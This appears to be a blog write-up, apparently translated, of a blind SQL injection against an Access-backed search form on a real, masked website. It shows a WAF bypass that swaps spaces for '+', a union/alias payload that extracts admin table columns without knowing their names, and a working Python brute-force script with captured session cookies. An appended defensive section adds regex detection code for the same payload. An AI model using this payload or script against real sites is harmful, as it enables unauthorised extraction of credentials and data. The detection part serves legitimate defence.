Belated happy new year. I haven't written anything in a long time, and I don't have much of substance to write about; I'm still too much of a beginner.
Since I rarely run into Access injection points in practice and have never studied Access injection seriously, my impression was that apart from offset injection, every other method needs the table and column names to be brute-forced. I came across a payload that needs no column names, so I looked into it.
Payload:asdf' or asc(mid((select a from(select 1,2,3 as a,4,5,6 from admin where 1=2 union select top 1 * from admin)ss),{},1))={} or 'a'='a
The injection point is in the search box.
The site sits behind a WTS WAF.
Replacing every space with + gets past it.
Let's go straight to the payload.
The payload first closes the quoted string, then uses or so that the truth of the whole condition depends on the injected comparison: the injected part is true or false under the attacker's control.
Look directly at the subquery: select+1,2,3+as+a,4,5,6+from+admin+where+1=2+union+select+top+1+*+from+admin
Reproduce it locally:
select 1,2,3 as a from admin where 1=2 union select top 1 * from admin
After execution, the third column of the result is returned under the column name a. Because where 1=2 is always false, the first SELECT contributes no rows, so what comes back is the result of select top 1 * from admin, labelled with the first SELECT's column names.
With that, the full expression is easy to read:
select a from (select 1,2,3 as a from admin where 1=2 union select top 1 * from admin)
is equivalent to select a from <the result set above>, i.e. the third column of the first admin row, obtained without knowing its real column name.
From there it is ordinary blind injection using mid and asc, one character at a time.
A short script dumps the value quickly; to dump a different column, just move the as a alias to that column's position in the first SELECT.
Script:
# coding=utf-8
import hackhttp

url = "https://xxx/webasp/ly.asp"
proxy = {'http': 'https://127.0.0.1:8080'}  # unused; the proxy tuple is passed to hh.http() below
user = ''
hh = hackhttp.hackhttp()

# Outer loop: character position inside the extracted value (1..32).
# Inner loop: candidate ASCII code for that position (43..125).
for i in range(1, 33):
    for j in range(43, 126):
        # Raw request is used so that the payload is sent exactly as written
        # (spaces already replaced with + to get past the WAF).
        # The first {} is the mid() offset, the second {} is the asc() value.
        raw_data = '''POST /webasp/ly.asp HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Origin: https://xxx.com
Connection: close
Referer: https://xxx.com/webasp/ly.asp
Cookie: bdshare_firstime=1613967788392; Hm_lvt_31533bb09acca10f4010ef9ed32e309e=1613967789,1614151209; config=; ASPSESSIONIDSCDCDDBQ=KOOFBPPCOPOMAJMGAONKHPJO; Hm_lpvt_31533bb09acca10f4010ef9ed32e309e=1614151993; ASPSESSIONIDQAADBDCR=FFDJJAADBHINHDLIIAKCDJBH
Upgrade-Insecure-Requests: 1

keywords=asdf'+or+asc(mid((select+a+from+(select+1,2,3+as+a,4,5,6+from+admin+where+1=2+union+select+top+1+*+from+admin)ss),{},1))={}+or+'a'='a
'''.format(i, j)
        code, head, html, redirect_url, log = hh.http(url=url, raw=raw_data, proxy=('127.0.0.1', 8080))
        # '2015' appears in the response only when the injected condition is true,
        # i.e. when the guessed ASCII code matches the character at position i.
        if '2015' in html:
            user += chr(j)
            print(user)
            break
With the requests library the payload gets URL-encoded, so I chose the hackhttp library instead.
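From the defender's side, the interesting detail above is the WAF bypass: in an application/x-www-form-urlencoded body, + already means a space, so a filter that inspects the raw body for space-separated SQL keywords never sees them. The following is an added example (not code from the original post) that decodes form fields the way the ASP application will before matching the signature of this alias/union blind-injection pattern; the field name keywords, the sample bodies and the score threshold are constructed for the demonstration.

```python
# Added example: detection of the Access alias/union blind-injection payload
# shape discussed above. Decodes form-urlencoded values before matching so that
# the '+'-for-space trick does not hide the SQL keywords from the detector.
import re
from urllib.parse import unquote_plus

# Signatures of the technique: a "where 1=2 union select top N *" subquery whose
# aliased column is read one character at a time through asc(mid(...)).
PATTERNS = [
    re.compile(r"union\s+select\s+top\s+\d+\s+\*", re.I),
    re.compile(r"\basc\s*\(\s*mid\s*\(", re.I),
    re.compile(r"where\s+1\s*=\s*2\s+union", re.I),
]


def normalize_form_field(raw_value: str) -> str:
    """Decode a form field as the application sees it ('+' and %XX become
    characters, '+' becomes a space) and collapse runs of whitespace."""
    decoded = unquote_plus(raw_value)
    return re.sub(r"\s+", " ", decoded).strip()


def score_field(raw_value: str) -> int:
    """Number of technique signatures present in one decoded field value."""
    text = normalize_form_field(raw_value)
    return sum(1 for p in PATTERNS if p.search(text))


def is_access_alias_injection(raw_value: str, threshold: int = 2) -> bool:
    """True when at least `threshold` signatures match (threshold is a constructed choice)."""
    return score_field(raw_value) >= threshold


def scan_post_body(body: str) -> dict:
    """Return {field_name: score} for every field of a form body that matched."""
    findings = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")  # split on the first '=' only
        score = score_field(value)
        if score:
            findings[unquote_plus(name)] = score
    return findings


# Constructed samples: the '+'-separated payload shape from the post (offset 1,
# guessed code 97) and an ordinary search query.
SAMPLE_MALICIOUS = ("keywords=asdf'+or+asc(mid((select+a+from+(select+1,2,3+as+a,4,5,6+from+admin"
                    "+where+1=2+union+select+top+1+*+from+admin)ss),1,1))=97+or+'a'='a")
SAMPLE_BENIGN = "keywords=new+year+greetings+2021"

if __name__ == "__main__":
    print(scan_post_body(SAMPLE_MALICIOUS))  # {'keywords': 3}
    print(scan_post_body(SAMPLE_BENIGN))     # {}
```

The same normalization should be applied to query strings and to any field the WAF inspects; matching the raw, still-encoded body is exactly what let the + substitution through here.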